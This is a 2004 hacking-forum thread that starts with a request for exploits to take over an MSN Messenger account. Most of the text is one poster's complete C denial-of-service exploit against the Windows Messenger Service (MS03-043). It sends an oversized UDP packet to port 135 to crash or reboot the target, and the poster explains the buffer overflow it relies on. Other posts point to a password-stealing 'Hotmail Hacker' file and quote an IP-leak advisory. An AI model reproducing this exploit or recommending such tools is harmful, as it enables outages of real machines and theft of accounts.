Msn Messenger

BeNiNuK

Jan 11 2004, 11:18 AM

Hi i was wondering if any 1 knows any good exploits to regain ur msn messenger account once some 1 has hacked it? if you can help please reply, and i will try to reward u in some way if u can help!

~peace

liquidSilver

Jan 11 2004, 11:28 AM

Where there exist a "Hotmail Hacker" withs steals a password thou MSN. But you'll need to send the guy a file, and he have to accept before it works!

- I haven't tested it yet, but give it a try!

I take no responsibillity.

Regards,
LS

liquidSilver

Jan 11 2004, 11:30 AM

Hmm, I can not upload it here.. Only in download section!

But use the seach button, and you will find it...

chris105

Jan 11 2004, 08:38 PM

How about trying to answer your secret question chances are it was a script kiddy that hacked it and he hasnt bothered to change your secret question, that is if it is really your account .......

icenix

Jan 11 2004, 10:42 PM

i hate all these kiddie requests..thats why im not pasting my MSN Exploit..
ie. NOT Johnny took over my account...
Johnny didnt take over your account... he guessed your password or used Forget Password...

pretty much my .c sploit is a buffer overflow... which i havnt posted here..im doing some work on it..

but i do have a DoS .c Exploit
launching one or two times this exploit against any machine running MS03-043
should reboot the machine...with relative ease... tested on Windows 2000 SP4
ive broken up the exploit so kids cant use it
everyone familiar will clearly see whats wrong with the exploit if not...message me.

pretty much the vulnerability results because the Messenger Service does not
properly validate the length of a message before passing it to the allocated
buffer" according to MS bulletin. Digging into it a bit more, we find that when
a character 0x14 in encountered in the 'body' part of the message, it is
replaced by a CR+LF. The buffer allocated for this operation is twice the size
of the string, which is the way to go, but is then copied to a buffer which
was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks
and overflow the fixed size buffer. Hope you guys enjoi it...

peac3 0ut..
icenix

CODE

#include <stdio.e>
#include <winsock.e>
#include <string.e>
#include <time.e>

// Packet format found thanks to a bit a sniffing hehehehe
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length

int main(int argc,char *argv[])
{
int i, packet_size, fields_size, s;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
char from[] = "RECCA";
char machine[] = "ZEUS";
char body[4096] = "*** MESSAGE ***";

WSADATA wsaData;

WSAStartup(0x0202, &wsaData);

ZeroMemory(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("192.168.186.3");
addr.sin_port = htons(135);

ZeroMemory(packet, sizeof(packet));
packet_size = 0;

memcpy(&packet[packet_size], packet_header, sizeof(packet_header) -
1);
packet_size += sizeof(packet_header) - 1;

i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
memset(body, 0x14, sizeof(body));
body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header)
- 1] = '\0';

i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i;

fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size;

fprintf(stdout, "Total length of strings = %d\nPacket size =
%d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),
packet_size, fields_size);

/*
for (i = 0; i < packet_size; i++)
{
if (i && ((i & 1) == 0))
fprintf(stdout, " ");
if (i && ((i & 15) == 0))
fprintf(stdout, "\n");
fprintf(stdout, "%02x", packet[i]);
}
fprintf(stdout, "\n");
*/
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
exit(EXIT_FAILURE);

if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr,
sizeof(addr)) == -1)
exit(EXIT_FAILURE);
/*
if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
exit(EXIT_FAILURE);
*/

exit(EXIT_SUCCESS);
}

vnet576

Jan 11 2004, 11:48 PM

QUOTE (icenix @ Jan 11 2004, 05:42 PM)

i hate all these kiddie requests..thats why im not pasting my MSN Exploit..

You call those people kiddies, yet if you are one as well if you don't realize that the messenger MS03-043 vulnerability has absolutely nothing to do with MSN messenger. They are completely different programs, and its funny actually imagining you doing work on you're buffer overflow exploit if you obviously have no clue about what program you're exploiting. Anyway good luck and have fun exploiting you're msn.

LiquidIce

Jan 12 2004, 01:04 AM

LOL

JaG

Jan 12 2004, 01:25 AM

I never understood why people would want to steal others accounts when they are for free? Thats like stealing free candy. Why waste your time gaining access to an account, wouldnt you be better of trying to get access to the users machine?

just my 2 cents

zero-maitimax

Jan 12 2004, 10:14 AM

well there is exploit in msn..

i don't know it but some time ago on www.mess.be there was a msg about a groupt that start the bigsister project.

they hacked about 400 computers. and have a profile of anyone..

i didn't believe it so i msg him on msn that i can't believe it..
and about 10sec the said what password i had..

i aske if i wanne share this exploit.. or maybe i could buy it..
but he didn't do that he said..

he allready contected microsoft about the exploit..

so.. :'(

zero-maitimax

Jan 13 2004, 09:25 AM

Microsoft MSN Messenger Information Leakage Weakness
Posted by UnderDOC on 2003-12-02 03:36:44

MSN Messenger is an instant messenging client for Microsoft Windows systems, based on the Passport system.

MSN Messenger is prone to an information leakage weakness.
It has been reported that the problem exist in the MSN client during a file transfer invitation requests. The client improperly processes incoming requests and may send sensitive data such as the IP address of the client to the remote host without first identifying that host. The expected behavior is that the client must accept the file transfer prior to revealing its IP address. However, by exploiting this weakness, it is possible to obtain the client IP address prior to the client user accepting the file transfer request. This presents a security threat because it will allow an attacker to enumerate IP addresses of client users.

This information could be used to launch direct attacks against the client system and network.

MSN Messenger versions 6.0.0602 and prior and all versions of Windows Messenger have been reported to be prone to this issue. Other versions of MSN Messenger could be affected as well.

http://www.securityfocus.com/bid/9082/exploit/

Faceless Master

Jan 13 2004, 04:30 PM

QUOTE (zero-maitimax @ Jan 13 2004, 09:25 AM)

Microsoft MSN Messenger Information Leakage Weakness
Posted by UnderDOC on 2003-12-02 03:36:44

MSN Messenger is an instant messenging client for Microsoft Windows systems, based on the Passport system.

MSN Messenger is prone to an information leakage weakness.
It has been reported that the problem exist in the MSN client during a file transfer invitation requests. The client improperly processes incoming requests and may send sensitive data such as the IP address of the client to the remote host without first identifying that host. The expected behavior is that the client must accept the file transfer prior to revealing its IP address. However, by exploiting this weakness, it is possible to obtain the client IP address prior to the client user accepting the file transfer request. This presents a security threat because it will allow an attacker to enumerate IP addresses of client users.

This information could be used to launch direct attacks against the client system and network.

MSN Messenger versions 6.0.0602 and prior and all versions of Windows Messenger have been reported to be prone to this issue. Other versions of MSN Messenger could be affected as well.

http://www.securityfocus.com/bid/9082/exploit/

I think it aint related with Passport Account Hijacking m8.
Its just Ip revealing..
Anyhow Thnx
Regards
~Faceless Master

chris105

Jan 14 2004, 09:59 PM

Why the (filtered) cant exploits be written in VB its the only language i know

Im off to buy a 40 lb c manual bye

chris105

Jan 14 2004, 10:02 PM

This is no disrespect to you but instead of fragmenting your code (or as well as, your choice) why dont you comment it, explain what each bit does then maybe "noobs" would learn and become superhuman like you i mean you were a noob once, or were you born "special"

zero-maitimax

Jan 15 2004, 11:20 AM

QUOTE (Faceless Master @ Jan 13 2004, 04:30 PM)

QUOTE (zero-maitimax @ Jan 13 2004, 09:25 AM)

Microsoft MSN Messenger Information Leakage Weakness
Posted by UnderDOC on 2003-12-02 03:36:44

MSN Messenger is an instant messenging client for Microsoft Windows systems, based on the Passport system.

MSN Messenger is prone to an information leakage weakness.
It has been reported that the problem exist in the MSN client during a file transfer invitation requests. The client improperly processes incoming requests and may send sensitive data such as the IP address of the client to the remote host without first identifying that host. The expected behavior is that the client must accept the file transfer prior to revealing its IP address. However, by exploiting this weakness, it is possible to obtain the client IP address prior to the client user accepting the file transfer request. This presents a security threat because it will allow an attacker to enumerate IP addresses of client users.

This information could be used to launch direct attacks against the client system and network.

MSN Messenger versions 6.0.0602 and prior and all versions of Windows Messenger have been reported to be prone to this issue. Other versions of MSN Messenger could be affected as well.

http://www.securityfocus.com/bid/9082/exploit/

I think it aint related with Passport Account Hijacking m8.
Its just Ip revealing..
Anyhow Thnx
Regards
~Faceless Master

yeah i know but i thought just post it becaurs this is olso usefull ..

in hte urly version of msn i used to get the ip of the ppl

nulladd

Jan 15 2004, 01:17 PM

QUOTE (chris105 @ Jan 15 2004, 08:59 AM)

Why the (filtered) cant exploits be written in VB its the only language i know

i agree that vb isnt such a bad language, but c is a lot more powerful and faster when ur dealing with memory allocation, plus its a more common lanuage across differnt platforms, like *nix

chris105

Jan 16 2004, 09:43 PM

I see, but I still get (filtered) off with people fragmenting their code and not explaining what each bit is and letting the person do a little work and defragment the source